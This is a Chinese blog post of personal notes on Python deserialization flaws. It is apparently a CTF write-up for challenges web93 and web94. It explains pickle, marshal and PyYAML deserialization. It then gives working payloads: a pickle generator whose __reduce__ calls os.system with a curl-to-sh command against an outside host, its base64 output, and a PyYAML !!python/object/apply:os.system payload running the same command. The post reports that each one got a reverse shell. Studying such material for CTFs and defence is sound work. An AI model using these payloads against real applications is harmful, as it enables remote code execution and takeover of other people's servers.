【心得】Python的反序列化漏洞个人笔记

目录

python反序列化

①web93

②web94


python反序列化

序列化:

类对象->字节流

反序列化:

字节流->对象

python序列化常用的模板

1 pickle

2 json

特征:

竟然不需要 恶意类

反序列化字符串里面包含类的所有定义,包括类的方法

php反序列化时,只能控制类的属性,利用现有的魔术方法做跳板

python反序列化时,直接可以不需要恶意类,也不需要现有的魔术方法,直接产生类的定义并执行__reduce__方法

Marshal 反序列化

pickle 类无法序列化 code类,为了弥补这个问题,2.6以后增加了marshal模块来处理

PyYAML 反序列化

!!python/object 标签

!!python/object/new 标签

!!python/object/apply 标签

①web93

payload生成脚本

复制代码
import pickle
import os
import base64

class test():
    def __init__(self):
        self.username=0
        self.password=0
    def login(self,username,password):
        return username=='admin' and password=='123456'
    #类似php里的__wakeup__魔术方法
    #返回一个元组,第一个成员是回调函数,第二个成员是回调函数的参数
    def __reduce__(self):
        print('reduce')
        return os.system,('curl https://your-shell.com/124.222.136.33:1337 |sh',)

a=test()
#生成字节流
serialize=pickle.dumps(a)
payload=base64.b64encode(serialize)
print(payload)

注意服务器是linux进行反序列化操作,我们也要在linux上进行序列化操作,否则会报错

payload:

复制代码
.../unserialize

data=gASVTgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDNjdXJsIGh0dHBzOi8veW91ci1zaGVsbC5jb20vMTI0LjIyMi4xMzYuMzM6MTMzNyB8c2iUhZRSlC4=

监听成功反弹shell

②web94

!!python/object/apply 的标签可以让 YAML 解析器执行 Python 代码

方括号被用于将命令字符串作为列表的单个元素,并将整个列表作为参数传递给 os.system 函数。使用方括号是因为 os.system 函数接受的参数类型是一个列表,而不是元组。通过将命令字符串放入列表中,可以确保 os.system 函数正确地接收到命令作为参数。

payload:

复制代码
.../unserialize
data=!!python/object/apply:os.system ["curl https://your-shell.com/124.222.136.33:1337 |sh"]

监听成功反弹shell

相关推荐
zhangrelay2 分钟前
三分钟云课实践速通--模拟电子技术-模电--SimulIDE
linux·笔记·学习·ubuntu·lubuntu
木木_王8 分钟前
嵌入式Linux学习 | 数据结构 (Day05) 栈与队列详解(原理 + C 语言实现 + 实战实验 + 易错点剖析)
linux·c语言·开发语言·数据结构·笔记·学习
lkforce13 分钟前
MiniMind学习笔记(三)--train_pretrain.py(预训练)
笔记·机器学习·ai·预训练·minimind·train_pretrain
Muyuan199816 分钟前
22.让 RAG Agent 更像真实产品:聊天页面优化、PDF 上传、知识库重建与检索片段展示
python·django·pdf·fastapi
OSwich20 分钟前
【 Godot 4 学习笔记】数组(Array)
笔记·学习·godot
程序员-小李27 分钟前
uv 学习总结:从零到一掌握现代化 Python 工具链
python·学习·uv
数据皮皮侠AI33 分钟前
中国城市可再生能源数据集(2005-2021)|顶刊 Sci Data 11 种能源面板
大数据·人工智能·笔记·能源·1024程序员节
Python大数据分析@35 分钟前
CLI一键采集,使用Python搭建TikTok电商爬虫Agent
开发语言·爬虫·python
研究点啥好呢41 分钟前
高德多模态算法工程师面试题精选:10道高频考题+答案解析
python·面试·llm·求职招聘·笔试·高德
测试员周周1 小时前
【AI测试系统】第3篇:AI生成的测试用例太“水”?14年老兵:规则引擎+AI才是王炸组合
人工智能·python·测试